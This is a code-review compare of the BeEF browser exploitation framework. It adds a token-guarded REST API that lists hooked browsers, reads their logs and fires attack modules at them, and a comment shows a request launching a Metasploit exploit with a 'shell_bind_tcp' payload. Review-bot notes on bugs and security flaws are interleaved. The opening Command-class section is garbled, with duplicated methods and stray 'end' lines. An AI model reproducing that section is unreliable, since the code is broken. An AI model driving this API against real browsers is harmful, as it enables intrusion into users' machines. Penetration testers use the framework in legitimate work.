(print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
(print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
@datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
}
# get, check and add the http_headers to the datastore
http_headers.keys.each { |http_header_key|
(print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
end
# Returns the output of the command. These are the actual instructions sent to the browser.
# @return [String] The command output
def output
# @note This class is the base class for all command modules in the framework.
# Two instances of this object are created during the execution of command module.
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
include BeEF::Core::Constants::Browsers
include BeEF::Core::Constants::CommandModule
# Super class controller
# @param [String] key command module key
def initialize(key)
config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}
end
# This function is called just before the instructions are sent to hooked browser.
def pre_send; end
# Callback method. This function is called when the hooked browser sends results back.
def callback; end
# If the command requires some data to be sent back, this function will process them.
# @param [] head
# @param [Hash] params Hash of parameters
# @todo Determine argument "head" type
def process_zombie_response(head, params); end
# Returns true if the command needs configurations to work. False if not.
# @deprecated This command should not be used since the implementation of the new configuration system
def needs_configuration?; !@datastore.nil?; end
# Returns information about the command in a JSON format.
# @return [String] JSON formatted string
def to_json
{
'Name' => @friendlyname,
'Description' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
'Category' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
'Data' => BeEF::Module.get_options(@key)
}.to_json
end
# Builds the 'datastore' attribute of the command which is used to generate javascript code.
# @param [Hash] data Data to be inserted into the datastore
# @todo Confirm argument "data" type
def build_datastore(data);
@datastore = JSON.parse(data)
end
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers, result, command_id, beefhook)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
http_params.keys.each { |http_params_key|
(print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
(print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
@datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
}
# get, check and add the http_headers to the datastore
http_headers.keys.each { |http_header_key|
(print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
@datastore['results'] = result
@datastore['cid'] = command_id
@datastore['beefhook'] = beefhook
end
# Returns the output of the command. These are the actual instructions sent to the browser.
# @return [String] The command output
def output
f = @path+'command.js'
(print_error "#{f} file does not exist";return) if not File.exists? f
command = BeEF::Core::Models::Command.first(:id => @command_id)
@eruby = Erubis::FastEruby.new(File.read(f))
@eruby = Erubis::FastEruby.new(File.read(f))
data = BeEF::Core::Configuration.instance.get("beef.module.#{@key}")
cc = BeEF::Core::CommandContext.new
cc['command_url'] = @default_command_url
cc['command_id'] = @command_id
JSON.parse(command['data']).each{|v|
cc[v['name']] = v['value']
cc[v['name']] = v['value']
}
if self.respond_to?(:execute)
self.execute
self.execute
end
@output = @eruby.evaluate(cc)
@output
end
# Saves the results received from the hooked browser
# @param [Hash] results Results from hooked browser
def save(results)
@results = results
end
# If nothing else than the file is specified, the function will map the file to a random path without any extension.
# @param [String] file File to be mounted
# @param [String] path URL path to mounted file
# @param [String] extension URL extension
# @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
# @deprecated This function is possibly deprecated in place of the API
def map_file_to_url(file, path=nil, extension=nil, count=1)
return BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
end
# Tells the framework to load a specific module of the BeEFJS library that the command will be using.
# @param [String] component String of BeEFJS component to load
# @note Example: use 'beef.net.local'
def use(component)
return if @beefjs_components.include? component
component_path = '/'+component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
@beefjs_components[component] = component_path
end
@output
end
# @todo Document
def oc_value(name)
# Saves the results received from the hooked browser
# @param [Hash] results Results from hooked browser
def save(results)
@results = results
end
# If nothing else than the file is specified, the function will map the file to a random path without any extension.
# @param [String] file File to be mounted
# @param [String] path URL path to mounted file
# @param [String] extension URL extension
# @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
# @deprecated This function is possibly deprecated in place of the API
def map_file_to_url(file, path=nil, extension=nil, count=1)
return BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
end
# Tells the framework to load a specific module of the BeEFJS library that the command will be using.
# @param [String] component String of BeEFJS component to load
# @note Example: use 'beef.net.local'
def use(component)
return if @beefjs_components.include? component
component_path = '/'+component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
@beefjs_components[component] = component_path
end
# @todo Document
def oc_value(name)
option = BeEF::Core::Models::OptionCache.first(:name => name)
return nil if not option
return option.value
end
return nil if not option
return option.value
end
# @todo Document
def apply_defaults()
@datastore.each { |opt|
opt["value"] = oc_value(opt["name"]) || opt["value"]
}
end
private
@use_template
@eruby
@update_zombie
@results
end
# @todo Document
def apply_defaults()
@datastore.each { |opt|
opt["value"] = oc_value(opt["name"]) || opt["value"]
}
end
private
@use_template
@eruby
@update_zombie
@results
end
end
end
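Review bot: `build_callback_datastore` now stores `result`, `command_id` and `beefhook` in the datastore verbatim (the three assignments at the end of the method), while every HTTP parameter and header in the same method passes through `BeEF::Filters.is_valid_command_module_datastore_key?`/`_param?` and `Erubis::XmlHelper.escape_xml`. `result` originates from the hooked browser, so give it the same validation and escaping before a module's `callback` sees it. `initialize` also no longer calls `get_extensions`, and the method itself is gone, so the `BeEF::API::Command.extended_in_modules` mixins must now be included somewhere else; worth pointing at where. The bare `@use_template`, `@eruby`, `@update_zombie` and `@results` lines under `private` are no-ops in Ruby (they read uninitialised instance variables of the class object) and can be removed, and `File.exists?` is a deprecated alias of `File.exist?`.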

View File

@@ -15,115 +15,122 @@
#
module BeEF
module Core
module Core
class Configuration
include Singleton
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(configuration_file="#{$root_dir}/config.yaml")
# argument type checking
raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
# test to make sure file exists
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
begin
#open base config
@config = self.load(configuration_file)
# set default value if key? does not exist
@config.default = nil
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
class Configuration
attr_accessor :config
# antisnatchor: still a singleton, but implemented by hand because we want to have only one instance
# of the Configuration object while having the possibility to specify a parameter to the constructor.
# This is why we don't use anymore the default Ruby implementation -> include Singleton
def self.instance()
return @@instance
end
end
# Loads yaml file
# @param [String] file YAML file to be loaded
# @return [Hash] YAML formatted hash
def load(file)
begin
return nil if not File.exists?(file)
raw = File.read(file)
return YAML.load(raw)
rescue Exception => e
print_debug "Unable to load '#{file}' #{e}"
return nil
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(config)
raise Exception::TypeError, '"config" needs to be a string' if not config.string?
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
begin
#open base config
@config = self.load(config)
# set default value if key? does not exist
@config.default = nil
@@config = config
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
end
@@instance = self
end
end
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
# @return [Hash|String] The resulting value stored against the 'key'
def get(key)
# Loads yaml file
# @param [String] file YAML file to be loaded
# @return [Hash] YAML formatted hash
def load(file)
begin
return nil if not File.exists?(file)
raw = File.read(file)
return YAML.load(raw)
rescue Exception => e
print_debug "Unable to load '#{file}' #{e}"
return nil
end
end
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
# @return [Hash|String] The resulting value stored against the 'key'
def get(key)
subkeys = key.split('.')
lastkey = subkeys.pop
subhash = subkeys.inject(@config) do |hash, k|
hash[k]
hash[k]
end
return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil
end
return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil
end
# Sets the give key value pair to the config instance
# @param [String] key The configuration key
# @param value The value to be stored against the 'key'
# @return [Boolean] If the store procedure was successful
def set(key, value)
# Sets the give key value pair to the config instance
# @param [String] key The configuration key
# @param value The value to be stored against the 'key'
# @return [Boolean] If the store procedure was successful
def set(key, value)
subkeys = key.split('.').reverse
return false if subkeys.length == 0
hash = {subkeys.shift.to_s => value}
subkeys.each{|v|
hash = {v.to_s => hash}
hash = {v.to_s => hash}
}
@config = @config.deep_merge(hash)
return true
end
end
# Clears the given key hash
# @param [String] key Configuration key to be cleared
# @return [Boolean] If the configuration key was cleared
def clear(key)
# Clears the given key hash
# @param [String] key Configuration key to be cleared
# @return [Boolean] If the configuration key was cleared
def clear(key)
subkeys = key.split('.')
return false if subkeys.length == 0
lastkey = subkeys.pop
hash = @config
subkeys.each{|v|
hash = hash[v]
hash = hash[v]
}
return (hash.delete(lastkey) == nil) ? false : true
end
return (hash.delete(lastkey) == nil) ? false : true
end
# Load extensions configurations
def load_extensions_config
# Load extensions configurations
def load_extensions_config
self.set('beef.extension', {})
Dir.glob("#{$root_dir}/extensions/*/config.yaml") do | cf |
y = self.load(cf)
if y != nil
y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
else
print_error "Unable to load extension configuration '#{cf}'"
end
y = self.load(cf)
if y != nil
y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
else
print_error "Unable to load extension configuration '#{cf}'"
end
end
end
end
# Load module configurations
def load_modules_config
# Load module configurations
def load_modules_config
self.set('beef.module', {})
Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
# API call for post module config load
BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
else
print_error "Unable to load module configuration '#{cf}'"
end
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
# API call for post module config load
BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
else
print_error "Unable to load module configuration '#{cf}'"
end
end
end
end
end
end
end
end
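Review bot: the hand-rolled singleton is not yet safe: `@@instance` is assigned only at the very end of `initialize`, so `BeEF::Core::Configuration.instance` called before construction raises `NameError: uninitialized class variable @@instance` instead of returning nil, and because `new` stays public every further `Configuration.new(path)` silently replaces the shared instance. Declare `@@instance = nil` at class level, hide `new` with `private_class_method :new` behind a `self.instance(config = nil)` that constructs on first use, and either use or drop `@@config` (it stores the file path but nothing reads it). The `rescue Exception` branch also calls `print_debug`, which in this compare itself calls `Configuration.instance`, so a failure while loading the file would raise the `NameError` above rather than print the intended message. Finally, `get` still walks `subkeys.inject(@config) { |hash, k| hash[k] }`, which raises `NoMethodError` on `nil` when an intermediate key is missing instead of returning nil.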

View File

@@ -14,7 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Core
module Console
module Banners
@@ -25,8 +25,8 @@ module Banners
# Prints BeEF's ascii art
#
def print_ascii_art
if File.exists?('extensions/console/beef.ascii')
File.open('extensions/console/beef.ascii', 'r') do |f|
if File.exists?('core/main/console/beef.ascii')
File.open('core/main/console/beef.ascii', 'r') do |f|
while line = f.gets
puts line
end
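Review bot: `'core/main/console/beef.ascii'` is a path relative to the current working directory, so the banner silently disappears when beef is started from another directory; the rest of the core resolves files against `$root_dir` (for example `"#{$root_dir}/config.yaml"` in `Configuration#initialize`), so use `File.join($root_dir, 'core/main/console/beef.ascii')` for both the `File.exists?` check and the `File.open`.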

View File

@@ -14,7 +14,7 @@
# limitations under the License.
#
module BeEF
module Extension
module Core
module Console
#
# This module parses the command line argument when running beef.
@@ -24,6 +24,8 @@ module BeEF
@options = Hash.new
@options[:verbose] = false
@options[:resetdb] = false
@options[:ascii_art] = false
@options[:ext_config] = ""
@already_parsed = false
@@ -35,19 +37,27 @@ module BeEF
return @options if @already_parsed
begin
optparse = OptionParser.new do |opts|
opts.on('-x', '--reset', 'Reset the database') do
@options[:resetdb] = true
optparse = OptionParser.new do |opts|
opts.on('-x', '--reset', 'Reset the database') do
@options[:resetdb] = true
end
opts.on('-v', '--verbose', 'Display debug information') do
@options[:verbose] = true
end
opts.on('-a', '--ascii_art', 'Prints BeEF ascii art') do
@options[:ascii_art] = true
end
opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
@options[:ext_config] = f
end
end
opts.on('-v', '--verbose', 'Display debug information') do
@options[:verbose] = true
end
end
optparse.parse!
@already_parsed = true
@options
optparse.parse!
@already_parsed = true
@options
rescue OptionParser::InvalidOption => e
puts "Invalid command line option provided. Please run beef --help"
exit 1
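Review bot: the new `-c/--config FILE` option introduces an error path that `rescue OptionParser::InvalidOption` does not cover: `beef -c` with no argument raises `OptionParser::MissingArgument`, a sibling subclass of `OptionParser::ParseError`, so the user gets a stack trace instead of the "Please run beef --help" hint. Rescue `OptionParser::ParseError` instead, and consider checking `File.exist?(f)` here rather than letting a bad path surface later as the `'Configuration yaml cannot be found'` TypeError. The remark about `custom-config.yaml` being git-ignored belongs in the README or a `.gitignore` comment, not in the option's help text.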

View File

@@ -36,6 +36,19 @@ module Core
# return random hex string
return OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
end
# Generate a secure random token, 20 chars, used as an auth token for the RESTful API.
# After creation it's stored in the BeEF configuration object => conf.get('beef.api_token')
# @return [String] Security token
def self.api_token
config = BeEF::Core::Configuration.instance
token_length = 20
# return random hex string
token = OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
config.set('beef.api_token', token)
token
end
end
end
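Review bot: the comment says the token is "20 chars", but `OpenSSL::Random.random_bytes(20).unpack("H*")[0]` yields 40 hexadecimal characters (20 random bytes); fix the comment or the intent. Every call also rewrites `beef.api_token` in the configuration, so a second call invalidates the token already handed to an API client; if the token is meant to be generated once at startup, state that in the docstring or return the existing value when one is already set.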

View File

@@ -55,9 +55,11 @@ module Handlers
beefhook = get_param(@data, 'beefhook')
(print_error "BeEFhook is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
result = get_param(@data, 'results')
# @note create the command module to handle the response
command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))
command.build_callback_datastore(@http_params, @http_header)
command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook)
command.session_id = beefhook
if command.respond_to?(:post_execute)
command.post_execute
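Review bot: `build_callback_datastore` now receives `result`, `command_id` and `beefhook`, but `command_id` is not defined anywhere in the visible lines of this hunk; confirm it is assigned earlier in the method and validated the way `beefhook` is (`BeEF::Filters.is_valid_hook_session_id?`), because `result` is taken straight from the request parameters with no check and now flows into the module's datastore.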

View File

@@ -28,8 +28,6 @@ module Models
property :path, Text, :lazy => false
has n, :commands
has 1, :dynamic_command_info
end
end
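Review bot: removing `has 1, :dynamic_command_info` together with the `DynamicCommandInfo` model (dropped further down in this compare) leaves the `core_dynamiccommandinfo` table behind on existing databases; either drop it explicitly or state in the commit message that `--reset` is required after updating.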

View File

@@ -54,7 +54,7 @@ module Handlers
'Expires' => '0',
'Content-Type' => 'text/javascript',
'Access-Control-Allow-Origin' => '*',
'Access-Control-Allow-Methods' => 'POST'
'Access-Control-Allow-Methods' => 'POST, GET'
}
)

core/main/rest/api.rb Normal file
View File

@@ -0,0 +1,44 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
module RegisterHooksHandler
def self.mount_handler(server)
server.mount('/api/hooks', BeEF::Core::Rest::HookedBrowsers.new)
end
end
module RegisterModulesHandler
def self.mount_handler(server)
server.mount('/api/modules', BeEF::Core::Rest::Modules.new)
end
end
module RegisterLogsHandler
def self.mount_handler(server)
server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
end
end
end
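Review bot: the three `Register*Handler` modules are identical apart from the path and class, so a single module iterating over a table such as `{'/api/hooks' => HookedBrowsers, '/api/modules' => Modules, '/api/logs' => Logs}` in `mount_handler` would avoid the repetition. More importantly, each REST class below re-implements the same `before` token filter and cache headers while extending `Sinatra::Base` directly, although this compare introduces `BeEF::Core::Router::Router` as the class "all the HTTP handlers registered on BeEF will extend"; a shared `BeEF::Core::Rest::Base < Router` holding the token check would keep the authentication logic in one place.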

View File

@@ -0,0 +1,77 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class HookedBrowsers < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found.' end
before do
error 401 unless params[:token] == config.get('beef.api_token')
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
get '/' do
online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
output = {
'hooked-browsers' => {
'online' => online_hooks,
'offline' => offline_hooks
}
}
output.to_json
end
def hb_to_json(hbs)
hbs_hash = {}
i = 0
hbs.each do |hb|
hbs_hash[i] = (get_hb_details(hb))
i+=1
end
hbs_hash
end
def get_hb_details(hb)
details = BeEF::Extension::Initialization::Models::BrowserDetails
{
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'SystemPlatform'),
'session' => hb.session,
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'page_uri' => details.get(hb.session, 'PageURI')
}
end
end
end
end
end
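Review bot: the `before` filter authenticates with `params[:token] == config.get('beef.api_token')`, a plain string comparison on a secret read from the query string, so the token lands in request logs and the browser history of whoever drives the API; prefer a request header and a constant-time comparison, and return 401 explicitly when `beef.api_token` is unset (today that case only 401s because `nil` never equals the parameter). `hb_to_json` also builds a Hash with integer keys 0..n, which `to_json` emits as string keys "0", "1", ...; an Array of hashes is the natural JSON shape and removes the manual counter. The 15-second online threshold appears twice; give it a named constant.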

View File

@@ -0,0 +1,74 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Logs < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found.' end
before do
error 401 unless params[:token] == config.get('beef.api_token')
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get all global logs
get '/' do
logs = BeEF::Core::Models::Log.all()
logs_to_json(logs)
end
# @note Get hooked browser logs
get '/:session' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
logs = BeEF::Core::Models::Log.all(:hooked_browser_id => hb.id)
logs_to_json(logs)
end
private
def logs_to_json(logs)
logs_json = []
count = logs.length
logs.each do |log|
logs_json << {
'id' => log.id.to_i,
'date' => log.date.to_s,
'event' => log.event.to_s,
'type' => log.type.to_s
}
end
{
'logs_count' => count,
'logs' => logs_json
}.to_json if not logs_json.empty?
end
end
end
end
end
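Review bot: `logs_to_json` returns `nil` when there are no logs because of the trailing `if not logs_json.empty?`, so `GET /api/logs` on a fresh install answers 200 with an empty body while still advertising `application/json`; return `{'logs_count' => 0, 'logs' => []}.to_json` unconditionally (which also makes `count` always meaningful). An unknown `:session` answers `error 401`, but the request has already passed the token filter; 404 is the right status and matches what `Modules` returns for an unknown module.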

View File

@@ -0,0 +1,147 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Core
module Rest
class Modules < Sinatra::Base
config = BeEF::Core::Configuration.instance
configure do set :show_exceptions, false end
not_found do 'Not Found.' end
before do
error 401 unless params[:token] == config.get('beef.api_token')
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Get all available and enabled modules (id, name, category)
get '/' do
mods = BeEF::Core::Models::CommandModule.all
mods_hash = {}
i = 0
mods.each do |mod|
modk = BeEF::Module.get_key_by_database_id(mod.id)
next if !BeEF::Module.is_enabled(modk)
mods_hash[i] = {
'id' => mod.id,
'name' => config.get("beef.module.#{modk}.name"),
'category' => config.get("beef.module.#{modk}.category")
}
i+=1
end
mods_hash.to_json
end
# @note Get the module definition (info, options)
get '/:mod_id' do
cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id])
error 404 unless cmd != nil
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 unless modk != nil
#todo check if it's possible to also retrieve the TARGETS supported
{
'name' => cmd.name,
'description' => config.get("beef.module.#{cmd.name}.description"),
'category'=> config.get("beef.module.#{cmd.name}.category"),
'options' => BeEF::Module.get_options(modk) #todo => get also payload options..get_payload_options(modk,text)
}.to_json
end
# @note Get the module result for the specific executed command
#
# Example with the Alert Dialog
#GET /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86/1?token=0a931a461d08b86bfee40df987aad7e9cfdeb050 HTTP/1.1
#Host: 127.0.0.1:3000
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#
#{"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
get '/:session/:mod_id/:cmd_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id,
:command_module_id => params[:mod_id], :id => params[:cmd_id])
error 404 unless cmd != nil
result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id)
error 404 unless result != nil
{
'date' => result.date,
'data' => result.data
}.to_json
end
# @note Fire a new command module to the specified hooked browser.
# Return the command_id of the executed module if it has been fired correctly.
# Input must be specified in JSON format
#
# +++ Example with the Alert Dialog: +++
#POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 18
#
#{"text":"michele"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","command_id":"1"}
#
# +++ Example with a Metasploit module (Adobe FlateDecode Stream Predictor 02 Integer Overflow) +++
# +++ note that in this case we cannot query BeEF/Metasploit if module execution was successful or not.
# +++ this is why there is "command_id":"not_available" in the response
#POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/236?token=83f13036060fd7d92440432dd9a9b5e5648f8d75 HTTP/1.1
#Host: 127.0.0.1:3000
#Content-Type: application/json; charset=UTF-8
#Content-Length: 81
#
#{"SRVPORT":"3992", "URIPATH":"77345345345dg", "PAYLOAD":"generic/shell_bind_tcp"}
#===response (snip)===
#HTTP/1.1 200 OK
#Content-Type: application/json; charset=UTF-8
#Content-Length: 35
#
#{"success":"true","command_id":"not_available"}
post '/:session/:mod_id' do
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
error 404 unless modk != nil
request.body.rewind
begin
data = JSON.parse request.body.read
options = []
data.each{|k,v| options.push({'name' => k, 'value' => v})}
exec_results = BeEF::Module.execute(modk, params[:session], options)
exec_results != nil ? '{"success":"true","command_id":"'+exec_results.to_s+'"}' : '{"success":"false"}'
rescue Exception => e
print_error "Invalid JSON input for module '#{params[:mod_id]}'"
error 400 # Bad Request
end
end
end
end
end
end
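Review bot: in `get '/:mod_id'` the description and category are looked up as `config.get("beef.module.#{cmd.name}.description")`, but the module configuration tree is keyed by module key, not display name: `get '/'` uses `modk` (`config.get("beef.module.#{modk}.name")`), and `modk` is already computed two lines above, so these two lookups almost certainly return nil; use `#{modk}`. In `post '/:session/:mod_id'` the `rescue Exception` wraps `BeEF::Module.execute` as well as `JSON.parse`, so any failure inside module execution is reported as "Invalid JSON input" with a 400; rescue `JSON::ParserError` around the parse only. The response bodies are hand-concatenated strings (`'{"success":"true","command_id":"'+exec_results.to_s+'"}'`) with `"true"` as a string rather than a boolean; build them with `{'success' => true, 'command_id' => exec_results}.to_json` as the GET handlers do. Same remark as for `Logs`: an unknown session should be 404, not 401.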

View File

@@ -14,23 +14,17 @@
# limitations under the License.
#
module BeEF
module Core
module Models
module Core
module Router
class DynamicCommandInfo
include DataMapper::Resource
storage_names[:default] = 'core_dynamiccommandinfo'
property :id, Serial
property :name, Text, :lazy => false
property :description, Text, :lazy => false
property :targets, Text, :lazy => false
belongs_to :command_module
module RegisterRouterHandler
def self.mount_handler(server)
server.mount('/', BeEF::Core::Router::Router.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Router::RegisterRouterHandler, BeEF::API::Server, 'mount_handler')
end
end
end
end
end
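Review bot: this file swaps the `DynamicCommandInfo` DataMapper model for the `RegisterRouterHandler` mount, two unrelated changes in one hunk; the model removal belongs with the `has 1, :dynamic_command_info` deletion in the `CommandModule` model. Mounting `Router` at `'/'` also makes it the catch-all for every request not claimed by another handler, so document (or assert in a test) that the server dispatches on the longest matching mount prefix, otherwise `/api/*` and the hook handler could be shadowed by the "Not Found" router.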

View File

@@ -0,0 +1,57 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
